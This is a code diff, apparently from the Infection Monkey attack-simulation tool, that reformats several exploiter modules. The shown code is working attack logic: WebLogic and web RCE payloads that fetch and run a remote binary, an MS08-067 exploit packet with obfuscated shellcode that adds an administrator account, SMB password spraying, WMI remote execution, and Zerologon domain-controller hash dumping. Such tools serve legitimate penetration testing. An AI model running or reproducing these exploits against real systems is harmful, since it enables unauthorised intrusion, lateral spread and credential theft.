LOG.info(
- "Host %s was already infected under the current configuration, done" % self.host
+ "Host %s was already infected under the current configuration, done" % self.host
)
return True
@@ -136,10 +142,10 @@ class WebRCE(HostExploiter):
# Execute remote monkey
if (
- self.execute_remote_monkey(
- self.get_target_url(), data["path"], exploit_config["dropper"]
- )
- is False
+ self.execute_remote_monkey(
+ self.get_target_url(), data["path"], exploit_config["dropper"]
+ )
+ is False
):
return False
@@ -163,15 +169,15 @@ class WebRCE(HostExploiter):
"""
candidate_services = {}
candidate_services.update(
- {
- service: self.host.services[service]
- for service in self.host.services
- if (
- self.host.services[service]
- and "name" in self.host.services[service]
- and self.host.services[service]["name"] in names
+ {
+ service:self.host.services[service]
+ for service in self.host.services
+ if (
+ self.host.services[service]
+ and "name" in self.host.services[service]
+ and self.host.services[service]["name"] in names
)
- }
+ }
)
valid_ports = [
@@ -196,11 +202,12 @@ class WebRCE(HostExploiter):
else:
command = commands["windows"]
# Format command
- command = command % {"monkey_path": path, "http_path": http_path}
+ command = command % {"monkey_path":path, "http_path":http_path}
except KeyError:
LOG.error(
- "Provided command is missing/bad for this type of host! "
- "Check upload_monkey function docs before using custom monkey's upload commands."
+ "Provided command is missing/bad for this type of host! "
+ "Check upload_monkey function docs before using custom monkey's upload "
+ "commands."
)
return False
return command
@@ -225,8 +232,10 @@ class WebRCE(HostExploiter):
def build_potential_urls(self, ports, extensions=None):
"""
- Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions.
- :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
+ Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and
+ extensions.
+ :param ports: Array of ports. One port is described as size 2 array: [port.no(int),
+ isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@@ -243,7 +252,7 @@ class WebRCE(HostExploiter):
else:
protocol = "http"
url_list.append(
- join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)
+ join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)
)
if not url_list:
LOG.info("No attack url's were built")
@@ -253,7 +262,8 @@ class WebRCE(HostExploiter):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
- :param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
+ :param stop_checking: If we want to continue checking for vulnerable url even though one
+ is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
@@ -304,8 +314,8 @@ class WebRCE(HostExploiter):
return False
else:
LOG.info(
- "Host %s was already infected under the current configuration, done"
- % str(self.host)
+ "Host %s was already infected under the current configuration, done"
+ % str(self.host)
)
return True
@@ -330,7 +340,8 @@ class WebRCE(HostExploiter):
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
- :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
+ :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [
+ port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
@@ -350,7 +361,8 @@ class WebRCE(HostExploiter):
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
- If you need multiple commands for the same os you can override this method to add backup commands
+ If you need multiple commands for the same os you can override this method to add backup
+ commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
@@ -360,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % {
- "monkey_path": dest_path,
- "http_path": http_path,
+ "monkey_path":dest_path,
+ "http_path":http_path,
}
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command)
@@ -370,7 +382,8 @@ class WebRCE(HostExploiter):
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
- :param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
+ :param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows':
+ WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
@@ -389,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
- commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
+ commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command)
self.add_executed_cmd(command)
@@ -402,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False:
return resp
else:
- return {"response": resp, "path": paths["dest_path"]}
+ return {"response":resp, "path":paths["dest_path"]}
def change_permissions(self, url, path, command=None):
"""
@@ -417,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows")
return True
if not command:
- command = CHMOD_MONKEY % {"monkey_path": path}
+ command = CHMOD_MONKEY % {"monkey_path":path}
try:
resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send()
@@ -435,7 +448,8 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
- "Could not change permission because monkey was not found. Check path parameter."
+ "Could not change permission because monkey was not found. Check path "
+ "parameter."
)
return False
LOG.info("Permission change finished")
@@ -457,21 +471,21 @@ class WebRCE(HostExploiter):
if default_path is False:
return False
monkey_cmd = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
+ self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
)
command = RUN_MONKEY % {
- "monkey_path": path,
- "monkey_type": DROPPER_ARG,
- "parameters": monkey_cmd,
+ "monkey_path":path,
+ "monkey_type":DROPPER_ARG,
+ "parameters":monkey_cmd,
}
else:
monkey_cmd = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, self.vulnerable_port
+ self.host, get_monkey_depth() - 1, self.vulnerable_port
)
command = RUN_MONKEY % {
- "monkey_path": path,
- "monkey_type": MONKEY_ARG,
- "parameters": monkey_cmd,
+ "monkey_path":path,
+ "monkey_type":MONKEY_ARG,
+ "parameters":monkey_cmd,
}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@@ -499,12 +513,13 @@ class WebRCE(HostExploiter):
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
- :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
+ :param url_to_monkey: Hosted monkey's url. egz :
+ http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey):
LOG.error(
- "Can't get destination path because source path %s is invalid.", url_to_monkey
+ "Can't get destination path because source path %s is invalid.", url_to_monkey
)
return False
try:
@@ -516,14 +531,15 @@ class WebRCE(HostExploiter):
return self.monkey_target_paths["win64"]
else:
LOG.error(
- "Could not figure out what type of monkey server was trying to upload, "
- "thus destination path can not be chosen."
+ "Could not figure out what type of monkey server was trying to upload, "
+ "thus destination path can not be chosen."
)
return False
except KeyError:
LOG.error(
- 'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize '
- "custom dict of monkey's destination paths"
+ 'Unknown key was found. Please use "linux", "win32" and "win64" keys to '
+ "initialize "
+ "custom dict of monkey's destination paths"
)
return False
@@ -540,7 +556,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
- return {"src_path": src_path, "dest_path": dest_path}
+ return {"src_path":src_path, "dest_path":dest_path}
def get_default_dropper_path(self):
"""
@@ -549,7 +565,7 @@ class WebRCE(HostExploiter):
E.g. config.dropper_target_path_linux(/tmp/monkey.sh) for linux host
"""
if not self.host.os.get("type") or (
- self.host.os["type"] != "linux" and self.host.os["type"] != "windows"
+ self.host.os["type"] != "linux" and self.host.os["type"] != "windows"
):
LOG.error("Target's OS was either unidentified or not supported. Aborting")
return False
@@ -577,8 +593,10 @@ class WebRCE(HostExploiter):
def are_vulnerable_urls_sufficient(self):
"""
- Determine whether the number of vulnerable URLs is sufficient in order to perform the full attack.
- Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a vulnerable URL is for
+ Determine whether the number of vulnerable URLs is sufficient in order to perform the
+ full attack.
+ Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
+ vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""
diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
index 2d1a40c0a..4e90d92d4 100644
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -24,9 +24,9 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15
# Malicious requests' headers:
HEADERS = {
- "Content-Type": "text/xml;charset=UTF-8",
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
+ "Content-Type":"text/xml;charset=UTF-8",
+ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+ "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
}
@@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host):
super(WebLogic201710271, self).__init__(
- host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
+ host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"}
)
def get_exploit_config(self):
@@ -78,13 +78,13 @@ class WebLogic201710271(WebRCE):
def exploit(self, url, command):
if "linux" in self.host.os["type"]:
payload = self.get_exploit_payload(
- "/bin/sh", "-c", command + " 1> /dev/null 2> /dev/null"
+ "/bin/sh", "-c", command + " 1> /dev/null 2> /dev/null"
)
else:
payload = self.get_exploit_payload("cmd", "/c", command + " 1> NUL 2> NUL")
try:
post(
- url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False
+ url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False
) # noqa: DUO123
except Exception as e:
LOG.error("Connection error: %s" % e)
@@ -122,7 +122,7 @@ class WebLogic201710271(WebRCE):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try:
post(
- url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False
+ url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False
) # noqa: DUO123
except exceptions.ReadTimeout:
# Our request will not get response thus we get ReadTimeout error
@@ -160,7 +160,8 @@ class WebLogic201710271(WebRCE):
:param command: command itself
:return: Formatted payload
"""
- empty_payload = """
+ empty_payload = """
@@ -195,7 +196,8 @@ class WebLogic201710271(WebRCE):
:param port: Server's port
:return: Formatted payload
"""
- generic_check_payload = """
+ generic_check_payload = """
@@ -272,7 +274,8 @@ class WebLogic20192725(WebRCE):
return exploit_config
def execute_remote_monkey(self, url, path, dropper=False):
- # Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
+ # Without delay exploiter tries to launch monkey file that is still finishing up after
+ # downloading.
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
@@ -289,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False
def check_if_exploitable(self, url):
- headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
+ headers = copy.deepcopy(HEADERS).update({"SOAPAction":""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "env:Client" in res.text:
return True
@@ -307,7 +310,8 @@ class WebLogic20192725(WebRCE):
"""
empty_payload = """
+ xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
+ xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
xx
xx
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index 16b971cd8..d9c0cdc51 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -63,22 +63,22 @@ OBFUSCATED_SHELLCODE = (
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
XP_PACKET = (
- "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
- "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
- "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
- "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
- "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
- "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
- "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
- "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
- "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
- "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
- "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
+ "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
+ "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
+ "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
+ "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
+ "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
+ "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
+ "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
+ "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
+ "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
+ "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
)
# Payload for Windows 2000 target
@@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
- "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
- "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
- "Windows 5.1": WindowsVersion.WindowsXP,
+ "Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
+ "Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
+ "Windows 5.1":WindowsVersion.WindowsXP,
}
def __init__(self, host):
@@ -202,19 +202,19 @@ class Ms08_067_Exploiter(HostExploiter):
def is_os_supported(self):
if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
- self._windows_versions.keys()
+ self._windows_versions.keys()
):
return True
if not self.host.os.get("type") or (
- self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
+ self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
):
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
if is_smb_open:
smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(self.host):
return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
- "version"
+ "version"
) in list(self._windows_versions.keys())
return False
@@ -226,7 +226,7 @@ class Ms08_067_Exploiter(HostExploiter):
return False
os_version = self._windows_versions.get(
- self.host.os.get("version"), WindowsVersion.Windows2003_SP2
+ self.host.os.get("version"), WindowsVersion.Windows2003_SP2
)
exploited = False
@@ -237,12 +237,12 @@ class Ms08_067_Exploiter(HostExploiter):
sock = exploit.start()
sock.send(
- "cmd /c (net user {} {} /add) &&"
- " (net localgroup administrators {} /add)\r\n".format(
- self._config.user_to_add,
- self._config.remote_user_pass,
- self._config.user_to_add,
- ).encode()
+ "cmd /c (net user {} {} /add) &&"
+ " (net localgroup administrators {} /add)\r\n".format(
+ self._config.user_to_add,
+ self._config.remote_user_pass,
+ self._config.user_to_add,
+ ).encode()
)
time.sleep(2)
sock.recv(1000)
@@ -260,22 +260,22 @@ class Ms08_067_Exploiter(HostExploiter):
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
- self.host,
- src_path,
- self._config.dropper_target_path_win_32,
- self._config.user_to_add,
- self._config.remote_user_pass,
+ self.host,
+ src_path,
+ self._config.dropper_target_path_win_32,
+ self._config.user_to_add,
+ self._config.remote_user_pass,
)
if not remote_full_path:
# try other passwords for administrator
for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(
- self.host,
- src_path,
- self._config.dropper_target_path_win_32,
- "Administrator",
- password,
+ self.host,
+ src_path,
+ self._config.dropper_target_path_win_32,
+ "Administrator",
+ password,
)
if remote_full_path:
break
@@ -286,18 +286,18 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
- "dropper_path": remote_full_path
+ "dropper_path":remote_full_path
} + build_monkey_commandline(
- self.host,
- get_monkey_depth() - 1,
- SRVSVC_Exploit.TELNET_PORT,
- self._config.dropper_target_path_win_32,
+ self.host,
+ get_monkey_depth() - 1,
+ SRVSVC_Exploit.TELNET_PORT,
+ self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
- "monkey_path": remote_full_path
+ "monkey_path":remote_full_path
} + build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
+ self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
)
try:
@@ -313,10 +313,10 @@ class Ms08_067_Exploiter(HostExploiter):
pass
LOG.info(
- "Executed monkey '%s' on remote victim %r (cmdline=%r)",
- remote_full_path,
- self.host,
- cmdline,
+ "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+ remote_full_path,
+ self.host,
+ cmdline,
)
return True
diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py
index 7120f5720..51397d8c7 100644
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@@ -55,25 +55,27 @@ class WmiExploiter(HostExploiter):
except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
LOG.debug(
- ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
+ ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
continue
except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
LOG.debug(
- ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
+ ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
continue
except socket.error:
LOG.debug(
- ("Network error in WMI connection to %r with " % self.host) + creds_for_logging
+ (
+ "Network error in WMI connection to %r with " % self.host) +
+ creds_for_logging
)
return False
except Exception as exc:
LOG.debug(
- ("Unknown WMI connection error to %r with " % self.host)
- + creds_for_logging
- + (" (%s):\n%s" % (exc, traceback.format_exc()))
+ ("Unknown WMI connection error to %r with " % self.host)
+ + creds_for_logging
+ + (" (%s):\n%s" % (exc, traceback.format_exc()))
)
return False
@@ -81,10 +83,10 @@ class WmiExploiter(HostExploiter):
# query process list and check if monkey already running on victim
process_list = WmiTools.list_object(
- wmi_connection,
- "Win32_Process",
- fields=("Caption",),
- where="Name='%s'" % ntpath.split(src_path)[-1],
+ wmi_connection,
+ "Win32_Process",
+ fields=("Caption",),
+ where="Name='%s'" % ntpath.split(src_path)[-1],
)
if process_list:
wmi_connection.close()
@@ -94,14 +96,14 @@ class WmiExploiter(HostExploiter):
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
- self.host,
- src_path,
- self._config.dropper_target_path_win_32,
- user,
- password,
- lm_hash,
- ntlm_hash,
- self._config.smb_download_timeout,
+ self.host,
+ src_path,
+ self._config.dropper_target_path_win_32,
+ user,
+ password,
+ lm_hash,
+ ntlm_hash,
+ self._config.smb_download_timeout,
)
if not remote_full_path:
@@ -110,44 +112,45 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
- "dropper_path": remote_full_path
+ "dropper_path":remote_full_path
} + build_monkey_commandline(
- self.host,
- get_monkey_depth() - 1,
- WmiExploiter.VULNERABLE_PORT,
- self._config.dropper_target_path_win_32,
+ self.host,
+ get_monkey_depth() - 1,
+ WmiExploiter.VULNERABLE_PORT,
+ self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
- "monkey_path": remote_full_path
+ "monkey_path":remote_full_path
} + build_monkey_commandline(
- self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
+ self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
)
# execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
- cmdline, ntpath.split(remote_full_path)[0], None
+ cmdline, ntpath.split(remote_full_path)[0], None
)
if (0 != result.ProcessId) and (not result.ReturnValue):
LOG.info(
- "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
- remote_full_path,
- self.host,
- result.ProcessId,
- cmdline,
+ "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
+ remote_full_path,
+ self.host,
+ result.ProcessId,
+ cmdline,
)
self.add_vuln_port(port="unknown")
success = True
else:
LOG.debug(
- "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
- remote_full_path,
- self.host,
- result.ProcessId,
- result.ReturnValue,
- cmdline,
+ "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
+ "cmdline=%r)",
+ remote_full_path,
+ self.host,
+ result.ProcessId,
+ result.ReturnValue,
+ cmdline,
)
success = False
diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py
index 9c18b2de3..28c73cc52 100644
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@@ -1,6 +1,7 @@
"""
Zerologon, CVE-2020-1472
-Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
+Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
+https://github.com/risksense/zerologon/.
"""
import logging
@@ -54,7 +55,8 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info(
- "Exploit not attempted. Target is most likely patched, or an error was encountered."
+ "Exploit not attempted. Target is most likely patched, or an error was "
+ "encountered."
)
return False
@@ -131,7 +133,8 @@ class ZerologonExploiter(HostExploiter):
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
LOG.info(
- f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something went wrong."
+ f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
+ f"went wrong."
)
return _exploited
@@ -194,13 +197,14 @@ class ZerologonExploiter(HostExploiter):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
- target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
- target_ip=self.dc_ip,
- dc_ip=self.dc_ip,
+ target=f"{self.dc_name}$@{self.dc_ip}",
+ # format for DC account - "NetBIOSName$@0.0.0.0"
+ target_ip=self.dc_ip,
+ dc_ip=self.dc_ip,
)
dumped_secrets = self.get_dumped_secrets(
- remote_name=self.dc_ip, username=f"{self.dc_name}$", options=options
+ remote_name=self.dc_ip, username=f"{self.dc_name}$", options=options
)
self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)
@@ -210,27 +214,28 @@ class ZerologonExploiter(HostExploiter):
for user in self._extracted_creds.keys():
if user == admin: # most likely to work so try this first
creds_to_use_for_getting_original_pwd_hashes.insert(
- 0, (user, self._extracted_creds[user])
+ 0, (user, self._extracted_creds[user])
)
else:
creds_to_use_for_getting_original_pwd_hashes.append(
- (user, self._extracted_creds[user])
+ (user, self._extracted_creds[user])
)
return creds_to_use_for_getting_original_pwd_hashes
except Exception as e:
LOG.info(
- f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}"
+ f"Exception occurred while dumping secrets to get some username and its "
+ f"password's NT hash: {str(e)}"
)
return None
def get_dumped_secrets(
- self,
- remote_name: str = "",
- username: str = "",
- options: Optional[object] = None,
+ self,
+ remote_name: str = "",
+ username: str = "",
+ options: Optional[object] = None,
) -> List[str]:
dumper = DumpSecrets(remote_name=remote_name, username=username, options=options)
dumped_secrets = dumper.dump().split("\n")
@@ -248,34 +253,34 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = {
- "RID": int(user_RID), # relative identifier
- "lm_hash": lmhash,
- "nt_hash": nthash,
+ "RID":int(user_RID), # relative identifier
+ "lm_hash":lmhash,
+ "nt_hash":nthash,
}
def store_extracted_creds_for_exploitation(self) -> None:
for user in self._extracted_creds.keys():
self.add_extracted_creds_to_exploit_info(
- user,
- self._extracted_creds[user]["lm_hash"],
- self._extracted_creds[user]["nt_hash"],
+ user,
+ self._extracted_creds[user]["lm_hash"],
+ self._extracted_creds[user]["nt_hash"],
)
self.add_extracted_creds_to_monkey_config(
- user,
- self._extracted_creds[user]["lm_hash"],
- self._extracted_creds[user]["nt_hash"],
+ user,
+ self._extracted_creds[user]["lm_hash"],
+ self._extracted_creds[user]["nt_hash"],
)
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update(
- {
- user: {
- "username": user,
- "password": "",
- "lm_hash": lmhash,
- "ntlm_hash": nthash,
+ {
+ user:{
+ "username":user,
+ "password":"",
+ "lm_hash":lmhash,
+ "ntlm_hash":nthash,
+ }
}
- }
)
# so other exploiters can use these creds
@@ -295,11 +300,11 @@ class ZerologonExploiter(HostExploiter):
try:
options = OptionsForSecretsdump(
- dc_ip=self.dc_ip,
- just_dc=False,
- system=os.path.join(os.path.expanduser("~"), "monkey-system.save"),
- sam=os.path.join(os.path.expanduser("~"), "monkey-sam.save"),
- security=os.path.join(os.path.expanduser("~"), "monkey-security.save"),
+ dc_ip=self.dc_ip,
+ just_dc=False,
+ system=os.path.join(os.path.expanduser("~"), "monkey-system.save"),
+ sam=os.path.join(os.path.expanduser("~"), "monkey-sam.save"),
